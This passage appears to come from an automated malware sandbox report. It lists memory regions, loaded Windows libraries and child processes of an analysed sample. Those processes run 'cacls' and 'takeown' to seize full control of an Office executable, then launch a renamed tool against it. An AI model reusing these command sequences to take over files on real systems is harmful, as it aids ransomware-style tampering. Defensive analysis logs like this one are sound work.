0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1318 start_va = 0xd305050000 end_va = 0xd305050fff entry_point = 0x0 region_type = private name = "private_0x000000d305050000" filename = "" Region: id = 1319 start_va = 0xd305060000 end_va = 0xd305060fff entry_point = 0x0 region_type = private name = "private_0x000000d305060000" filename = "" Region: id = 1320 start_va = 0xd305070000 end_va = 0xd3050affff entry_point = 0x0 region_type = private name = "private_0x000000d305070000" filename = "" Region: id = 1321 start_va = 0xd305210000 end_va = 0xd305397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d305210000" filename = "" Region: id = 1322 start_va = 0xd3053b0000 end_va = 0xd305530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3053b0000" filename = "" Region: id = 1323 start_va = 0xd305540000 end_va = 0xd30693ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d305540000" filename = "" Region: id = 1324 start_va = 0xd306b10000 end_va = 0xd306b1ffff entry_point = 0x0 region_type = private name = "private_0x000000d306b10000" filename = "" Region: id = 1325 start_va = 0x7ff7fc4ca000 end_va = 0x7ff7fc4cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc4ca000" filename = "" Region: id = 1326 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1327 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1328 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1329 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1330 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1331 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1332 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1333 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1334 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1335 start_va = 0xd3050b0000 end_va = 0xd3050b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3050b0000" filename = "" Region: id = 1336 start_va = 0xd3069a0000 end_va = 0xd3069affff entry_point = 0x0 region_type = private name = "private_0x000000d3069a0000" filename = "" Region: id = 1337 start_va = 0xd3069b0000 end_va = 0xd306abbfff entry_point = 0x0 region_type = private name = "private_0x000000d3069b0000" filename = "" Region: id = 1338 start_va = 0xd306b20000 end_va = 0xd306e56fff entry_point = 0xd306b20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1339 start_va = 0xd306e60000 end_va = 0xd30707afff entry_point = 0x0 region_type = private name = "private_0x000000d306e60000" filename = "" Region: id = 1340 start_va = 0xd307080000 end_va = 0xd307290fff entry_point = 0x0 region_type = private name = "private_0x000000d307080000" filename = "" Region: id = 1341 start_va = 0xd3072a0000 end_va = 0xd3074bdfff entry_point = 0x0 region_type = private name = "private_0x000000d3072a0000" filename = "" Region: id = 1342 start_va = 0xd3074c0000 end_va = 0xd3075cdfff entry_point = 0x0 region_type = private name = "private_0x000000d3074c0000" filename = "" Region: id = 1343 start_va = 0xd3075d0000 end_va = 0xd307687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3075d0000" filename = "" Region: id = 1344 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1345 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1346 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1347 start_va = 0xd3050c0000 end_va = 0xd3050c6fff entry_point = 0x0 region_type = private name = "private_0x000000d3050c0000" filename = "" Region: id = 1348 start_va = 0xd3050d0000 end_va = 0xd3050d4fff entry_point = 0xd3050d0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1349 start_va = 0xd3050e0000 end_va = 0xd3050e0fff entry_point = 0xd3050e0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1350 start_va = 0xd3050f0000 end_va = 0xd3050f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3050f0000" filename = "" Region: id = 1351 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Thread: id = 128 os_tid = 0x278 Thread: id = 129 os_tid = 0x5f4 Thread: id = 130 os_tid = 0xe38 Thread: id = 131 os_tid = 0xad0 Process: id = "17" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x3f6a6000" os_pid = "0x818" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x804" cmd_line = "cacls \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1403 start_va = 0x750000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1404 start_va = 0x770000 end_va = 0x771fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 1405 start_va = 0x780000 end_va = 0x793fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 1406 start_va = 0x7a0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1407 start_va = 0x7e0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 1408 start_va = 0x820000 end_va = 0x823fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 1409 start_va = 0x830000 end_va = 0x830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 1410 start_va = 0x840000 end_va = 0x841fff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1411 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 1412 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 1413 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1414 start_va = 0x7ec30000 end_va = 0x7ec52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec30000" filename = "" Region: id = 1415 start_va = 0x7ec57000 end_va = 0x7ec57fff entry_point = 0x0 region_type = private name = "private_0x000000007ec57000" filename = "" Region: id = 1416 start_va = 0x7ec5c000 end_va = 0x7ec5efff entry_point = 0x0 region_type = private name = "private_0x000000007ec5c000" filename = "" Region: id = 1417 start_va = 0x7ec5f000 end_va = 0x7ec5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec5f000" filename = "" Region: id = 1418 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1419 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1420 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 1421 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1422 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1423 start_va = 0x8f0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1424 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1425 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1426 start_va = 0xa80000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 1427 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1428 start_va = 0x750000 end_va = 0x75ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 1429 start_va = 0x760000 end_va = 0x763fff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1430 start_va = 0x850000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 1431 start_va = 0x890000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1432 start_va = 0x900000 end_va = 0x9bdfff entry_point = 0x900000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1433 start_va = 0x4f70000 end_va = 0x4f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 1434 start_va = 0x74490000 end_va = 0x744b7fff entry_point = 0x74490000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1435 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1436 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1437 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1438 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1439 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1440 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1441 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1442 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1443 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1444 start_va = 0x7eb30000 end_va = 0x7ec2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb30000" filename = "" Region: id = 1445 start_va = 0x7ec59000 end_va = 0x7ec5bfff entry_point = 0x0 region_type = private name = "private_0x000000007ec59000" filename = "" Thread: id = 133 os_tid = 0xe58 Thread: id = 134 os_tid = 0xe5c Process: id = "18" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x3dbb000" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x804" cmd_line = "takeown /F \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1460 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 1461 start_va = 0xad0000 end_va = 0x4acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 1462 start_va = 0x4ad0000 end_va = 0x4aeffff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 1463 start_va = 0x4af0000 end_va = 0x4af1fff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 1464 start_va = 0x4b00000 end_va = 0x4b13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b00000" filename = "" Region: id = 1465 start_va = 0x4b20000 end_va = 0x4b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 1466 start_va = 0x4b60000 end_va = 0x4b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 1467 start_va = 0x4ba0000 end_va = 0x4ba3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ba0000" filename = "" Region: id = 1468 start_va = 0x4bb0000 end_va = 0x4bb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bb0000" filename = "" Region: id = 1469 start_va = 0x4bc0000 end_va = 0x4bc1fff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 1470 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1471 start_va = 0x7f670000 end_va = 0x7f692fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f670000" filename = "" Region: id = 1472 start_va = 0x7f693000 end_va = 0x7f693fff entry_point = 0x0 region_type = private name = "private_0x000000007f693000" filename = "" Region: id = 1473 start_va = 0x7f698000 end_va = 0x7f698fff entry_point = 0x0 region_type = private name = "private_0x000000007f698000" filename = "" Region: id = 1474 start_va = 0x7f69d000 end_va = 0x7f69ffff entry_point = 0x0 region_type = private name = "private_0x000000007f69d000" filename = "" Region: id = 1475 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1476 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1477 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 1478 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1479 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1488 start_va = 0x4c20000 end_va = 0x4c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 1489 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1490 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1491 start_va = 0x4cf0000 end_va = 0x4deffff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 1492 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1493 start_va = 0x4ad0000 end_va = 0x4adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 1494 start_va = 0x4ae0000 end_va = 0x4ae3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ae0000" filename = "" Region: id = 1495 start_va = 0x4bd0000 end_va = 0x4c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 1496 start_va = 0x4c30000 end_va = 0x4cedfff entry_point = 0x4c30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1497 start_va = 0x4df0000 end_va = 0x4e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 1498 start_va = 0x4f70000 end_va = 0x4f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 1499 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1500 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1501 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1502 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1503 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1504 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1505 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1506 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1507 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1508 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1509 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1510 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1511 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1512 start_va = 0x7f570000 end_va = 0x7f66ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f570000" filename = "" Region: id = 1513 start_va = 0x7f69a000 end_va = 0x7f69cfff entry_point = 0x0 region_type = private name = "private_0x000000007f69a000" filename = "" Region: id = 1514 start_va = 0x4f80000 end_va = 0x5107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f80000" filename = "" Region: id = 1515 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1516 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1518 start_va = 0x4af0000 end_va = 0x4af4fff entry_point = 0x4af0000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 1519 start_va = 0x4c10000 end_va = 0x4c10fff entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 1520 start_va = 0x4e30000 end_va = 0x4e30fff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 1521 start_va = 0x5110000 end_va = 0x5290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005110000" filename = "" Region: id = 1522 start_va = 0x52a0000 end_va = 0x669ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000052a0000" filename = "" Region: id = 1523 start_va = 0x66a0000 end_va = 0x69d6fff entry_point = 0x66a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1524 start_va = 0x74480000 end_va = 0x744a7fff entry_point = 0x74480000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1525 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Thread: id = 135 os_tid = 0xb38 Thread: id = 136 os_tid = 0x5c0 Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6e1c5000" os_pid = "0xe04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x804" cmd_line = "C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1540 start_va = 0x530000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1541 start_va = 0x550000 end_va = 0x551fff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1542 start_va = 0x560000 end_va = 0x573fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1543 start_va = 0x580000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1544 start_va = 0x5c0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = 